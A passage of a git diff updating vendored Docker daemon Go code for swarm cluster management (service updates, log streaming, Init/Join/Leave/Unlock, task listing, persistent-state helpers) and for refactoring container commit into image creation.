newCtnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) + newCtnr.Image = digestImage + } else { + logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) + } + + // Replace the context with a fresh one. + // If we timed out while communicating with the + // registry, then "ctx" will already be expired, which + // would cause UpdateService below to fail. Reusing + // "ctx" could make it impossible to update a service + // if the registry is slow or unresponsive. + var cancel func() + ctx, cancel = c.getRequestContext() + defer cancel() + } + } + + var rollback swarmapi.UpdateServiceRequest_Rollback + switch flags.Rollback { + case "", "none": + rollback = swarmapi.UpdateServiceRequest_NONE + case "previous": + rollback = swarmapi.UpdateServiceRequest_PREVIOUS + default: + return fmt.Errorf("unrecognized rollback option %s", flags.Rollback) + } + + _, err = state.controlClient.UpdateService( + ctx, + &swarmapi.UpdateServiceRequest{ + ServiceID: currentService.ID, + Spec: &serviceSpec, + ServiceVersion: &swarmapi.Version{ + Index: version, + }, + Rollback: rollback, + }, + ) + return err + }) + return resp, err +} + +// RemoveService removes a service from a managed swarm cluster. +func (c *Cluster) RemoveService(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + service, err := getService(ctx, state.controlClient, input, false) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}) + return err + }) +} + +// ServiceLogs collects service logs and writes them back to `config.OutStream` +func (c *Cluster) ServiceLogs(ctx context.Context, selector *backend.LogSelector, config *apitypes.ContainerLogsOptions) (<-chan *backend.LogMessage, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + swarmSelector, err := convertSelector(ctx, state.controlClient, selector) + if err != nil { + return nil, errors.Wrap(err, "error making log selector") + } + + // set the streams we'll use + stdStreams := []swarmapi.LogStream{} + if config.ShowStdout { + stdStreams = append(stdStreams, swarmapi.LogStreamStdout) + } + if config.ShowStderr { + stdStreams = append(stdStreams, swarmapi.LogStreamStderr) + } + + // Get tail value squared away - the number of previous log lines we look at + var tail int64 + // in ContainerLogs, if the tail value is ANYTHING non-integer, we just set + // it to -1 (all). i don't agree with that, but i also think no tail value + // should be legitimate. if you don't pass tail, we assume you want "all" + if config.Tail == "all" || config.Tail == "" { + // tail of 0 means send all logs on the swarmkit side + tail = 0 + } else { + t, err := strconv.Atoi(config.Tail) + if err != nil { + return nil, errors.New("tail value must be a positive integer or \"all\"") + } + if t < 0 { + return nil, errors.New("negative tail values not supported") + } + // we actually use negative tail in swarmkit to represent messages + // backwards starting from the beginning. also, -1 means no logs. so, + // basically, for api compat with docker container logs, add one and + // flip the sign. we error above if you try to negative tail, which + // isn't supported by docker (and would error deeper in the stack + // anyway) + // + // See the logs protobuf for more information + tail = int64(-(t + 1)) + } + + // get the since value - the time in the past we're looking at logs starting from + var sinceProto *gogotypes.Timestamp + if config.Since != "" { + s, n, err := timetypes.ParseTimestamps(config.Since, 0) + if err != nil { + return nil, errors.Wrap(err, "could not parse since timestamp") + } + since := time.Unix(s, n) + sinceProto, err = gogotypes.TimestampProto(since) + if err != nil { + return nil, errors.Wrap(err, "could not parse timestamp to proto") + } + } + + stream, err := state.logsClient.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ + Selector: swarmSelector, + Options: &swarmapi.LogSubscriptionOptions{ + Follow: config.Follow, + Streams: stdStreams, + Tail: tail, + Since: sinceProto, + }, + }) + if err != nil { + return nil, err + } + + messageChan := make(chan *backend.LogMessage, 1) + go func() { + defer close(messageChan) + for { + // Check the context before doing anything. + select { + case <-ctx.Done(): + return + default: + } + subscribeMsg, err := stream.Recv() + if err == io.EOF { + return + } + // if we're not io.EOF, push the message in and return + if err != nil { + select { + case <-ctx.Done(): + case messageChan <- &backend.LogMessage{Err: err}: + } + return + } + + for _, msg := range subscribeMsg.Messages { + // make a new message + m := new(backend.LogMessage) + m.Attrs = make([]backend.LogAttr, 0, len(msg.Attrs)+3) + // add the timestamp, adding the error if it fails + m.Timestamp, err = gogotypes.TimestampFromProto(msg.Timestamp) + if err != nil { + m.Err = err + } + + nodeKey := contextPrefix + ".node.id" + serviceKey := contextPrefix + ".service.id" + taskKey := contextPrefix + ".task.id" + + // copy over all of the details + for _, d := range msg.Attrs { + switch d.Key { + case nodeKey, serviceKey, taskKey: + // we have the final say over context details (in case there + // is a conflict (if the user added a detail with a context's + // key for some reason)) + default: + m.Attrs = append(m.Attrs, backend.LogAttr{Key: d.Key, Value: d.Value}) + } + } + m.Attrs = append(m.Attrs, + backend.LogAttr{Key: nodeKey, Value: msg.Context.NodeID}, + backend.LogAttr{Key: serviceKey, Value: msg.Context.ServiceID}, + backend.LogAttr{Key: taskKey, Value: msg.Context.TaskID}, + ) + + switch msg.Stream { + case swarmapi.LogStreamStdout: + m.Source = "stdout" + case swarmapi.LogStreamStderr: + m.Source = "stderr" + } + m.Line = msg.Data + + // there could be a case where the reader stops accepting + // messages and the context is canceled. we need to check that + // here, or otherwise we risk blocking forever on the message + // send. + select { + case <-ctx.Done(): + return + case messageChan <- m: + } + } + } + }() + return messageChan, nil +} + +// convertSelector takes a backend.LogSelector, which contains raw names that +// may or may not be valid, and converts them to an api.LogSelector proto. It +// returns an error if something fails +func convertSelector(ctx context.Context, cc swarmapi.ControlClient, selector *backend.LogSelector) (*swarmapi.LogSelector, error) { + // don't rely on swarmkit to resolve IDs, do it ourselves + swarmSelector := &swarmapi.LogSelector{} + for _, s := range selector.Services { + service, err := getService(ctx, cc, s, false) + if err != nil { + return nil, err + } + c := service.Spec.Task.GetContainer() + if c == nil { + return nil, errors.New("logs only supported on container tasks") + } + swarmSelector.ServiceIDs = append(swarmSelector.ServiceIDs, service.ID) + } + for _, t := range selector.Tasks { + task, err := getTask(ctx, cc, t) + if err != nil { + return nil, err + } + c := task.Spec.GetContainer() + if c == nil { + return nil, errors.New("logs only supported on container tasks") + } + swarmSelector.TaskIDs = append(swarmSelector.TaskIDs, task.ID) + } + return swarmSelector, nil +} + +// imageWithDigestString takes an image such as name or name:tag +// and returns the image pinned to a digest, such as name@sha256:34234 +func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { + ref, err := reference.ParseAnyReference(image) + if err != nil { + return "", err + } + namedRef, ok := ref.(reference.Named) + if !ok { + if _, ok := ref.(reference.Digested); ok { + return image, nil + } + return "", errors.Errorf("unknown image reference format: %s", image) + } + // only query registry if not a canonical reference (i.e. with digest) + if _, ok := namedRef.(reference.Canonical); !ok { + namedRef = reference.TagNameOnly(namedRef) + + taggedRef, ok := namedRef.(reference.NamedTagged) + if !ok { + return "", errors.Errorf("image reference not tagged: %s", image) + } + + repo, _, err := c.config.ImageBackend.GetRepository(ctx, taggedRef, authConfig) + if err != nil { + return "", err + } + dscrptr, err := repo.Tags(ctx).Get(ctx, taggedRef.Tag()) + if err != nil { + return "", err + } + + namedDigestedRef, err := reference.WithDigest(taggedRef, dscrptr.Digest) + if err != nil { + return "", err + } + // return familiar form until interface updated to return type + return reference.FamiliarString(namedDigestedRef), nil + } + // reference already contains a digest, so just return it + return reference.FamiliarString(ref), nil +} + +// digestWarning constructs a formatted warning string +// using the image name that could not be pinned by digest. The +// formatting is hardcoded, but could me made smarter in the future +func digestWarning(image string) string { + return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/swarm.go new file mode 100644 index 0000000000..2f498ce263 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/swarm.go @@ -0,0 +1,569 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + "net" + "strings" + "time" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/signal" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/manager/encryption" + swarmnode "github.com/docker/swarmkit/node" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// Init initializes new cluster from user provided request. +func (c *Cluster) Init(req types.InitRequest) (string, error) { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + if c.nr != nil { + if req.ForceNewCluster { + + // Take c.mu temporarily to wait for presently running + // API handlers to finish before shutting down the node. + c.mu.Lock() + if !c.nr.nodeState.IsManager() { + return "", errSwarmNotManager + } + c.mu.Unlock() + + if err := c.nr.Stop(); err != nil { + return "", err + } + } else { + return "", errSwarmExists + } + } + + if err := validateAndSanitizeInitRequest(&req); err != nil { + return "", errdefs.InvalidParameter(err) + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + return "", err + } + + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + if err != nil { + return "", err + } + + dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr) + if err != nil { + return "", err + } + + localAddr := listenHost + + // If the local address is undetermined, the advertise address + // will be used as local address, if it belongs to this system. + // If the advertise address is not local, then we try to find + // a system address to use as local address. If this fails, + // we give up and ask the user to pass the listen address. + if net.ParseIP(localAddr).IsUnspecified() { + advertiseIP := net.ParseIP(advertiseHost) + + found := false + for _, systemIP := range listSystemIPs() { + if systemIP.Equal(advertiseIP) { + localAddr = advertiseIP.String() + found = true + break + } + } + + if !found { + ip, err := c.resolveSystemAddr() + if err != nil { + logrus.Warnf("Could not find a local address: %v", err) + return "", errMustSpecifyListenAddr + } + localAddr = ip.String() + } + } + + nr, err := c.newNodeRunner(nodeStartConfig{ + forceNewCluster: req.ForceNewCluster, + autolock: req.AutoLockManagers, + LocalAddr: localAddr, + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), + DataPathAddr: dataPathAddr, + availability: req.Availability, + }) + if err != nil { + return "", err + } + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + if err := <-nr.Ready(); err != nil { + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + if !req.ForceNewCluster { // if failure on first attempt don't keep state + if err := clearPersistentState(c.root); err != nil { + return "", err + } + } + return "", err + } + state := nr.State() + if state.swarmNode == nil { // should never happen but protect from panic + return "", errors.New("invalid cluster state for spec initialization") + } + if err := initClusterSpec(state.swarmNode, req.Spec); err != nil { + return "", err + } + return state.NodeID(), nil +} + +// Join makes current Cluster part of an existing swarm cluster. +func (c *Cluster) Join(req types.JoinRequest) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + c.mu.Lock() + if c.nr != nil { + c.mu.Unlock() + return errors.WithStack(errSwarmExists) + } + c.mu.Unlock() + + if err := validateAndSanitizeJoinRequest(&req); err != nil { + return errdefs.InvalidParameter(err) + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + return err + } + + var advertiseAddr string + if req.AdvertiseAddr != "" { + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + // For joining, we don't need to provide an advertise address, + // since the remote side can detect it. + if err == nil { + advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) + } + } + + dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr) + if err != nil { + return err + } + + nr, err := c.newNodeRunner(nodeStartConfig{ + RemoteAddr: req.RemoteAddrs[0], + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: advertiseAddr, + DataPathAddr: dataPathAddr, + joinAddr: req.RemoteAddrs[0], + joinToken: req.JoinToken, + availability: req.Availability, + }) + if err != nil { + return err + } + + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + select { + case <-time.After(swarmConnectTimeout): + return errSwarmJoinTimeoutReached + case err := <-nr.Ready(): + if err != nil { + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + if err := clearPersistentState(c.root); err != nil { + return err + } + } + return err + } +} + +// Inspect retrieves the configuration properties of a managed swarm cluster. +func (c *Cluster) Inspect() (types.Swarm, error) { + var swarm types.Swarm + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := c.inspect(ctx, state) + if err != nil { + return err + } + swarm = s + return nil + }); err != nil { + return types.Swarm{}, err + } + return swarm, nil +} + +func (c *Cluster) inspect(ctx context.Context, state nodeState) (types.Swarm, error) { + s, err := getSwarm(ctx, state.controlClient) + if err != nil { + return types.Swarm{}, err + } + return convert.SwarmFromGRPC(*s), nil +} + +// Update updates configuration of a managed swarm cluster. +func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + swarm, err := getSwarm(ctx, state.controlClient) + if err != nil { + return err + } + + // Validate spec name. + if spec.Annotations.Name == "" { + spec.Annotations.Name = "default" + } else if spec.Annotations.Name != "default" { + return errdefs.InvalidParameter(errors.New(`swarm spec must be named "default"`)) + } + + // In update, client should provide the complete spec of the swarm, including + // Name and Labels. If a field is specified with 0 or nil, then the default value + // will be used to swarmkit. + clusterSpec, err := convert.SwarmSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + _, err = state.controlClient.UpdateCluster( + ctx, + &swarmapi.UpdateClusterRequest{ + ClusterID: swarm.ID, + Spec: &clusterSpec, + ClusterVersion: &swarmapi.Version{ + Index: version, + }, + Rotation: swarmapi.KeyRotation{ + WorkerJoinToken: flags.RotateWorkerToken, + ManagerJoinToken: flags.RotateManagerToken, + ManagerUnlockKey: flags.RotateManagerUnlockKey, + }, + }, + ) + return err + }) +} + +// GetUnlockKey returns the unlock key for the swarm. +func (c *Cluster) GetUnlockKey() (string, error) { + var resp *swarmapi.GetUnlockKeyResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + client := swarmapi.NewCAClient(state.grpcConn) + + r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + if len(resp.UnlockKey) == 0 { + // no key + return "", nil + } + return encryption.HumanReadableKey(resp.UnlockKey), nil +} + +// UnlockSwarm provides a key to decrypt data that is encrypted at rest. +func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + + c.mu.RLock() + state := c.currentNodeState() + + if !state.IsActiveManager() { + // when manager is not active, + // unless it is locked, otherwise return error. + if err := c.errNoManager(state); err != errSwarmLocked { + c.mu.RUnlock() + return err + } + } else { + // when manager is active, return an error of "not locked" + c.mu.RUnlock() + return notLockedError{} + } + + // only when swarm is locked, code running reaches here + nr := c.nr + c.mu.RUnlock() + + key, err := encryption.ParseHumanReadableKey(req.UnlockKey) + if err != nil { + return errdefs.InvalidParameter(err) + } + + config := nr.config + config.lockKey = key + if err := nr.Stop(); err != nil { + return err + } + nr, err = c.newNodeRunner(config) + if err != nil { + return err + } + + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + if err := <-nr.Ready(); err != nil { + if errors.Cause(err) == errSwarmLocked { + return invalidUnlockKey{} + } + return errors.Errorf("swarm component could not be started: %v", err) + } + return nil +} + +// Leave shuts down Cluster and removes current state. +func (c *Cluster) Leave(force bool) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + + c.mu.Lock() + nr := c.nr + if nr == nil { + c.mu.Unlock() + return errors.WithStack(errNoSwarm) + } + + state := c.currentNodeState() + + c.mu.Unlock() + + if errors.Cause(state.err) == errSwarmLocked && !force { + // leave a locked swarm without --force is not allowed + return errors.WithStack(notAvailableError("Swarm is encrypted and locked. Please unlock it first or use `--force` to ignore this message.")) + } + + if state.IsManager() && !force { + msg := "You are attempting to leave the swarm on a node that is participating as a manager. " + if state.IsActiveManager() { + active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID()) + if err == nil { + if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { + if isLastManager(reachable, unreachable) { + msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " + return errors.WithStack(notAvailableError(msg)) + } + msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) + } + } + } else { + msg += "Doing so may lose the consensus of your cluster. " + } + + msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." + return errors.WithStack(notAvailableError(msg)) + } + // release readers in here + if err := nr.Stop(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") + return err + } + + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + + if nodeID := state.NodeID(); nodeID != "" { + nodeContainers, err := c.listContainerForNode(nodeID) + if err != nil { + return err + } + for _, id := range nodeContainers { + if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { + logrus.Errorf("error removing %v: %v", id, err) + } + } + } + + // todo: cleanup optional? + if err := clearPersistentState(c.root); err != nil { + return err + } + c.config.Backend.DaemonLeavesCluster() + return nil +} + +// Info returns information about the current cluster state. +func (c *Cluster) Info() types.Info { + info := types.Info{ + NodeAddr: c.GetAdvertiseAddress(), + } + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + info.LocalNodeState = state.status + if state.err != nil { + info.Error = state.err.Error() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + if state.IsActiveManager() { + info.ControlAvailable = true + swarm, err := c.inspect(ctx, state) + if err != nil { + info.Error = err.Error() + } + + info.Cluster = &swarm.ClusterInfo + + if r, err := state.controlClient.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err != nil { + info.Error = err.Error() + } else { + info.Nodes = len(r.Nodes) + for _, n := range r.Nodes { + if n.ManagerStatus != nil { + info.Managers = info.Managers + 1 + } + } + } + } + + if state.swarmNode != nil { + for _, r := range state.swarmNode.Remotes() { + info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr}) + } + info.NodeID = state.swarmNode.NodeID() + } + + return info +} + +func validateAndSanitizeInitRequest(req *types.InitRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + + if req.Spec.Annotations.Name == "" { + req.Spec.Annotations.Name = "default" + } else if req.Spec.Annotations.Name != "default" { + return errors.New(`swarm spec must be named "default"`) + } + + return nil +} + +func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + if len(req.RemoteAddrs) == 0 { + return errors.New("at least 1 RemoteAddr is required to join") + } + for i := range req.RemoteAddrs { + req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i]) + if err != nil { + return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) + } + } + return nil +} + +func validateAddr(addr string) (string, error) { + if addr == "" { + return addr, errors.New("invalid empty address") + } + newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) + if err != nil { + return addr, nil + } + return strings.TrimPrefix(newaddr, "tcp://"), nil +} + +func initClusterSpec(node *swarmnode.Node, spec types.Spec) error { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + for conn := range node.ListenControlSocket(ctx) { + if ctx.Err() != nil { + return ctx.Err() + } + if conn != nil { + client := swarmapi.NewControlClient(conn) + var cluster *swarmapi.Cluster + for i := 0; ; i++ { + lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return fmt.Errorf("error on listing clusters: %v", err) + } + if len(lcr.Clusters) == 0 { + if i < 10 { + time.Sleep(200 * time.Millisecond) + continue + } + return errors.New("empty list of clusters was returned") + } + cluster = lcr.Clusters[0] + break + } + // In init, we take the initial default values from swarmkit, and merge + // any non nil or 0 value from spec to GRPC spec. This will leave the + // default value alone. + // Note that this is different from Update(), as in Update() we expect + // user to specify the complete spec of the cluster (as they already know + // the existing one and knows which field to update) + clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ + ClusterID: cluster.ID, + ClusterVersion: &cluster.Meta.Version, + Spec: &clusterSpec, + }) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + return nil + } + } + return ctx.Err() +} + +func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { + var ids []string + filters := filters.NewArgs() + filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) + containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ + Filters: filters, + }) + if err != nil { + return []string{}, err + } + for _, c := range containers { + ids = append(ids, c.ID) + } + return ids, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/tasks.go b/vendor/github.com/docker/docker/daemon/cluster/tasks.go new file mode 100644 index 0000000000..de1240dfe8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/tasks.go @@ -0,0 +1,87 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetTasks returns a list of tasks matching the filter options. +func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { + var r *swarmapi.ListTasksResponse + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + filterTransform := func(filter filters.Args) error { + if filter.Contains("service") { + serviceFilters := filter.Get("service") + for _, serviceFilter := range serviceFilters { + service, err := getService(ctx, state.controlClient, serviceFilter, false) + if err != nil { + return err + } + filter.Del("service", serviceFilter) + filter.Add("service", service.ID) + } + } + if filter.Contains("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + node, err := getNode(ctx, state.controlClient, nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", node.ID) + } + } + if !filter.Contains("runtime") { + // default to only showing container tasks + filter.Add("runtime", "container") + filter.Add("runtime", "") + } + return nil + } + + filters, err := newListTasksFilters(options.Filters, filterTransform) + if err != nil { + return err + } + + r, err = state.controlClient.ListTasks( + ctx, + &swarmapi.ListTasksRequest{Filters: filters}) + return err + }); err != nil { + return nil, err + } + + tasks := make([]types.Task, 0, len(r.Tasks)) + for _, task := range r.Tasks { + t, err := convert.TaskFromGRPC(*task) + if err != nil { + return nil, err + } + tasks = append(tasks, t) + } + return tasks, nil +} + +// GetTask returns a task by an ID. +func (c *Cluster) GetTask(input string) (types.Task, error) { + var task *swarmapi.Task + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + t, err := getTask(ctx, state.controlClient, input) + if err != nil { + return err + } + task = t + return nil + }); err != nil { + return types.Task{}, err + } + return convert.TaskFromGRPC(*task) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/utils.go b/vendor/github.com/docker/docker/daemon/cluster/utils.go new file mode 100644 index 0000000000..d55e0012b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/utils.go @@ -0,0 +1,63 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/ioutils" +) + +func loadPersistentState(root string) (*nodeStartConfig, error) { + dt, err := ioutil.ReadFile(filepath.Join(root, stateFile)) + if err != nil { + return nil, err + } + // missing certificate means no actual state to restore from + if _, err := os.Stat(filepath.Join(root, "certificates/swarm-node.crt")); err != nil { + if os.IsNotExist(err) { + clearPersistentState(root) + } + return nil, err + } + var st nodeStartConfig + if err := json.Unmarshal(dt, &st); err != nil { + return nil, err + } + return &st, nil +} + +func savePersistentState(root string, config nodeStartConfig) error { + dt, err := json.Marshal(config) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(root, stateFile), dt, 0600) +} + +func clearPersistentState(root string) error { + // todo: backup this data instead of removing? + // rather than delete the entire swarm directory, delete the contents in order to preserve the inode + // (for example, allowing it to be bind-mounted) + files, err := ioutil.ReadDir(root) + if err != nil { + return err + } + + for _, f := range files { + if err := os.RemoveAll(filepath.Join(root, f.Name())); err != nil { + return err + } + } + + return nil +} + +func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool { + return reachable-2 <= unreachable +} + +func isLastManager(reachable, unreachable int) bool { + return reachable == 1 && unreachable == 0 +} diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go index 1e7bffb1dc..0f6f440514 100644 --- a/vendor/github.com/docker/docker/daemon/commit.go +++ b/vendor/github.com/docker/docker/daemon/commit.go @@ -1,9 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" "fmt" - "io" "runtime" "strings" "time" @@ -11,12 +9,8 @@ import ( "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/builder/dockerfile" - "github.com/docker/docker/container" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) // merge merges two Config, the image container configuration (defaults values), @@ -94,6 +88,9 @@ func merge(userConf, imageConf *containertypes.Config) error { if userConf.Healthcheck.Timeout == 0 { userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout } + if userConf.Healthcheck.StartPeriod == 0 { + userConf.Healthcheck.StartPeriod = imageConf.Healthcheck.StartPeriod + } if userConf.Healthcheck.Retries == 0 { userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries } @@ -117,155 +114,73 @@ func merge(userConf, imageConf *containertypes.Config) error { return nil } -// Commit creates a new filesystem image from the current state of a container. -// The image can optionally be tagged into a repository. -func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) { +// CreateImageFromContainer creates a new image from a container. The container +// config will be updated by applying the change set to the custom config, then +// applying that config over the existing container config. +func (daemon *Daemon) CreateImageFromContainer(name string, c *backend.CreateImageConfig) (string, error) { start := time.Now() container, err := daemon.GetContainer(name) if err != nil { return "", err } - // It is not possible to commit a running container on Windows and on Solaris. - if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() { - return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS) - } - - if c.Pause && !container.IsPaused() { - daemon.containerPause(container) - defer daemon.containerUnpause(container) + // It is not possible to commit a running container on Windows + if (runtime.GOOS == "windows") && container.IsRunning() { + return "", errors.Errorf("%+v does not support commit of a running container", runtime.GOOS) } - newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes) - if err != nil { - return "", err + if container.IsDead() { + err := fmt.Errorf("You cannot commit container %s which is Dead", container.ID) + return "", errdefs.Conflict(err) } - if c.MergeConfigs { - if err := merge(newConfig, container.Config); err != nil { - return "", err - } + if container.IsRemovalInProgress() { + err := fmt.Errorf("You cannot commit container %s which is being removed", container.ID) + return "", errdefs.Conflict(err) } - rwTar, err := daemon.exportContainerRw(container) - if err != nil { - return "", err + if c.Pause && !container.IsPaused() { + daemon.containerPause(container) + defer daemon.containerUnpause(container) } - defer func() { - if rwTar != nil { - rwTar.Close() - } - }() - - var history []image.History - rootFS := image.NewRootFS() - osVersion := "" - var osFeatures []string - if container.ImageID != "" { - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return "", err - } - history = img.History - rootFS = img.RootFS - osVersion = img.OSVersion - osFeatures = img.OSFeatures + if c.Config == nil { + c.Config = container.Config } - - l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID()) + newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes, container.OS) if err != nil { return "", err } - defer layer.ReleaseAndLog(daemon.layerStore, l) - - h := image.History{ - Author: c.Author, - Created: time.Now().UTC(), - CreatedBy: strings.Join(container.Config.Cmd, " "), - Comment: c.Comment, - EmptyLayer: true, - } - - if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID { - h.EmptyLayer = false - rootFS.Append(diffID) - } - - history = append(history, h) - - config, err := json.Marshal(&image.Image{ - V1Image: image.V1Image{ - DockerVersion: dockerversion.Version, - Config: newConfig, - Architecture: runtime.GOARCH, - OS: runtime.GOOS, - Container: container.ID, - ContainerConfig: *container.Config, - Author: c.Author, - Created: h.Created, - }, - RootFS: rootFS, - History: history, - OSFeatures: osFeatures, - OSVersion: osVersion, - }) - - if err != nil { + if err := merge(newConfig, container.Config); err != nil { return "", err } - id, err := daemon.imageStore.Create(config) + id, err := daemon.imageService.CommitImage(backend.CommitConfig{ + Author: c.Author, + Comment: c.Comment, + Config: newConfig, + ContainerConfig: container.Config, + ContainerID: container.ID, + ContainerMountLabel: container.MountLabel, + ContainerOS: container.OS, + ParentImageID: string(container.ImageID), + }) if err != nil { return "", err } - if container.ImageID != "" { - if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil { - return "", err - } - } - - imageRef := "" + var imageRef string if c.Repo != "" { - newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer + imageRef, err = daemon.imageService.TagImage(string(id), c.Repo, c.Tag) if err != nil { return "", err } - if c.Tag != "" { - if newTag, err = reference.WithTag(newTag, c.Tag); err != nil { - return "", err - } - } - if err := 